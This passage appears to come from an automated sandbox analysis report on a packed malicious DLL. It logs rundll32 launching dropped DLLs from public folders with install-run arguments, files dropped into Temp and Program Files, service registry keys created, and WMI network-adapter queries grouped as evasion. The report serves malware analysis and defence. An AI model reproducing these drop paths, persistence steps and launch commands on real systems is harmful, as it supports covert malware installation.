Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 "C:\Users\Public\wss_tmp\cr_ws_2.dll" main --install-run
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 "C:\Users\Public\fbe\fbegbhf.dll" main -c uninstall
Source: C:\Windows\SysWOW64\rundll32.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\rundll32.exe rundll32 "C:\Users\Public\wss_tmp\cr_ws_2.dll" main --install-run
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\rundll32.exe "rundll32.exe" "C:\Users\Public\wss_tmp\cr_ws_2.dll" main JkoI28tA7 s54VVA9PL
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\rundll32.exe rundll32 "C:\Users\Public\fbe\fbegbhf.dll" main -c uninstall
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\rundll32.exe rundll32 "C:\Users\Public\wss_tmp\cr_ws_2.dll" main --install-run
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\rundll32.exe "rundll32.exe" "C:\Users\Public\wss_tmp\cr_ws_2.dll" main 5l2dLaWBz 8H16fjAVL
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\rundll32.exe rundll32 "C:\Users\Public\fbe\fbegbhf.dll" main -c install-run
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\rundll32.exe rundll32 "C:\Users\Public\fbe\fbegbhf.dll" main -c uninstall
Source: C:\Windows\System32\svchost.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe Section loaded: moshost.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mapsbtsvc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mosstorage.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ztrace_maps.dll
Source: C:\Windows\System32\svchost.exe Section loaded: bcp47langs.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mapconfiguration.dll
Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\svchost.exe Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe Section loaded: aphostservice.dll
Source: C:\Windows\System32\svchost.exe Section loaded: networkhelper.dll
Source: C:\Windows\System32\svchost.exe Section loaded: userdataplatformhelperutil.dll
Source: C:\Windows\System32\svchost.exe Section loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: syncutil.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mccspal.dll
Source: C:\Windows\System32\svchost.exe Section loaded: vaultcli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dmcfgutils.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dmcmnutils.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dmxmlhelputils.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe Section loaded: inproclogger.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: flightsettings.dll
Source: C:\Windows\System32\svchost.exe Section loaded: windows.networking.connectivity.dll
Source: C:\Windows\System32\svchost.exe Section loaded: npmproxy.dll
Source: C:\Windows\System32\svchost.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msv1_0.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ntlmshared.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cryptdll.dll
Source: C:\Windows\System32\svchost.exe Section loaded: synccontroller.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pimstore.dll
Source: C:\Windows\System32\svchost.exe Section loaded: aphostclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: accountaccessor.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dsclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exe Section loaded: systemeventsbrokerclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: userdatalanguageutil.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mccsengineshared.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cemapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: userdatatypehelperutil.dll
Source: C:\Windows\System32\svchost.exe Section loaded: phoneutil.dll
Source: C:\Windows\System32\svchost.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\svchost.exe Section loaded: execmodelproxy.dll
Source: C:\Windows\System32\svchost.exe Section loaded: rmclient.dll
Source: C:\Windows\System32\loaddll32.exe Section loaded: apphelp.dll
Source: C:\Windows\System32\loaddll32.exe Section loaded: msvcp140.dll
Source: C:\Windows\System32\loaddll32.exe Section loaded: vcruntime140.dll
Source: C:\Windows\System32\loaddll32.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe Section loaded: w32time.dll
Source: C:\Windows\System32\svchost.exe Section loaded: logoncli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exe Section loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\svchost.exe Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dsrole.dll
Source: C:\Windows\System32\svchost.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: vmictimeprovider.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\svchost.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe Section loaded: storsvc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: devobj.dll
Source: C:\Windows\System32\svchost.exe Section loaded: fltlib.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exe Section loaded: bcd.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wer.dll
Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cabinet.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\svchost.exe Section loaded: appxdeploymentclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: storageusage.dll
Source: C:\Windows\System32\svchost.exe Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: propsys.dll
Source: C:\Windows\System32\svchost.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe Section loaded: usosvc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exe Section loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: updatepolicy.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cabinet.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\svchost.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: upshared.dll
Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: usocoreps.dll
Source: C:\Windows\System32\svchost.exe Section loaded: usoapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: anuwhqTXGt.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: anuwhqTXGt.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: anuwhqTXGt.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: anuwhqTXGt.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: anuwhqTXGt.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: anuwhqTXGt.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: anuwhqTXGt.dll Static PE information: DYNAMIC_BASE, NX_COMPAT
Source: anuwhqTXGt.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: d:\Projects\Visual Studio\NSIS Plugins\IpConfig\Output\Unicode\Plugins\IpConfig.pdb source: IpConfig.dll.15.dr, IpConfig.dll.6.dr, IpConfig.dll.7.dr
Source: Binary string: d:\Projects\Visual Studio\NSIS Plugins\IpConfig\Output\Unicode\Plugins\IpConfig.pdb$ source: IpConfig.dll.15.dr, IpConfig.dll.6.dr, IpConfig.dll.7.dr
Source: Binary string: t:\untgz\MoreInfo\SRC\Release\MoreInfo.pdb source: MoreInfo.dll.7.dr, MoreInfo.dll.15.dr, MoreInfo.dll.6.dr
Source: anuwhqTXGt.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: anuwhqTXGt.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: anuwhqTXGt.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: anuwhqTXGt.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: anuwhqTXGt.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Windows\System32\rundll32.exe Code function: 33_2_0000021BD9431090 VirtualAlloc,VirtualProtect,LoadLibraryA,GetProcAddress, 33_2_0000021BD9431090
Source: fbegbhf.dll.7.dr Static PE information: section name: _RDATA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046A4F90 push 00000004h; ret 6_2_046A4FFC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046A500D push 00000004h; iretd 6_2_046A5014
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046B48F3 push ecx; ret 6_2_046B4906
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046D28AD push esi; ret 6_2_046D28B6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_6D4C0C04 push E800003Ah; ret 6_2_6D4C0C09
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_045F48F3 push ecx; ret 7_2_045F4906
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_046128AD push esi; ret 7_2_046128B6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_034648F3 push ecx; ret 15_2_03464906
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_034828AD push esi; ret 15_2_034828B6
Source: C:\Windows\System32\rundll32.exe Code function: 33_2_0000021BD944DD7D push rcx; retf 003Fh 33_2_0000021BD944DD7E
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_00000166D886DD7D push rcx; retf 003Fh 34_2_00000166D886DD7E
Source: C:\Windows\System32\rundll32.exe Code function: 39_2_000001C9C67001ED push rcx; retf 003Fh 39_2_000001C9C67001EE
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1

Persistence and Installation Behavior

Source: C:\Windows\SysWOW64\rundll32.exe Process created: reg.exe
Source: C:\Windows\SysWOW64\rundll32.exe Process created: reg.exe
Source: C:\Windows\SysWOW64\rundll32.exe Process created: reg.exe
Source: C:\Windows\SysWOW64\rundll32.exe Process created: reg.exe
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Temp\nsqF009.tmp\MoreInfo.dll
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Temp\nszFA3A.tmp\md5dll.dll
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Temp\nssF49D.tmp\nsExec.dll
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Program Files (x86)\Wimsys\uninstall.exe
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Temp\nssF49D.tmp\SimpleSC.dll
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Temp\nsqF009.tmp\System.dll
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Temp\nssF49D.tmp\MoreInfo.dll
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Program Files (x86)\Wimsys\msg.exe
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Temp\nszFA3A.tmp\IpConfig.dll
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\Public\wss_tmp\cr_ws_2.dll
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Temp\nssF49D.tmp\IpConfig.dll
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Temp\nszFA3A.tmp\inetc.dll
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Temp\nszFA3A.tmp\System.dll
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\Public\fbe\fbegbhf.dll
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Temp\nszFA3A.tmp\MoreInfo.dll
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Temp\nssF49D.tmp\md5dll.dll
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Temp\nszFA3A.tmp\SimpleSC.dll
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Temp\nsqF009.tmp\inetc.dll
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Temp\nssF49D.tmp\System.dll
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Temp\nsqF009.tmp\IpConfig.dll
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Temp\nsqF009.tmp\nsExec.dll
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Temp\nsqF009.tmp\md5dll.dll
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Temp\nsqF009.tmp\SimpleSC.dll
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Temp\nssF49D.tmp\inetc.dll
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Temp\nszFA3A.tmp\nsExec.dll
Source: C:\Windows\SysWOW64\rundll32.exe Registry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\b0ce0805d069128c445841c673b20d15
Source: C:\Windows\System32\svchost.exe Registry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\W32Time\Config
Source: C:\Windows\System32\rundll32.exe Code function: 33_2_0000021BD9773160 OpenSCManagerA,OpenServiceW,QueryServiceStatusEx,StartServiceA,CloseServiceHandle,CloseServiceHandle, 33_2_0000021BD9773160
Source: C:\Windows\System32\rundll32.exe Code function: 33_2_0000021BD97922AC EncodePointer,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 33_2_0000021BD97922AC
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Windows\SysWOW64\rundll32.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : Select * from Win32_NetworkAdapter Where NetEnabled=TRUE
Source: C:\Windows\SysWOW64\rundll32.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_NetworkAdapterConfiguration WHERE IPEnabled = True
Source: C:\Windows\SysWOW64\rundll32.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_NetworkAdapter WHERE DeviceID = 1
Source: C:\Windows\SysWOW64\rundll32.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_NetworkAdapterConfiguration WHERE Index = 1
Source: C:\Windows\SysWOW64\rundll32.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_NetworkAdapterConfiguration WHERE IPEnabled = True
Source: C:\Windows\SysWOW64\rundll32.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_NetworkAdapter WHERE DeviceID = 1
Source: C:\Windows\SysWOW64\rundll32.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_NetworkAdapterConfiguration WHERE Index = 1
Source: C:\Windows\SysWOW64\rundll32.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : Select * from Win32_NetworkAdapter Where NetEnabled=TRUE
Source: C:\Windows\SysWOW64\rundll32.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_NetworkAdapterConfiguration WHERE IPEnabled = True
